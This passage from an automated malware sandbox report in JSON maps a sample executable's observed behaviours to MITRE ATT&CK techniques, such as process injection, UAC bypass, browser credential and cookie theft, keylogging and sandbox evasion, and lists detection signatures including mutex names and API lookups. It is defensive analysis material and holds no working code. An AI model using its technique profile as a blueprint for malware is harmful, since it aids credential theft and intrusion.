"informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 5, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74B90000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Rmc-DSGECX\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Rmc-DSGECX\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched \"NetworkListManager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS 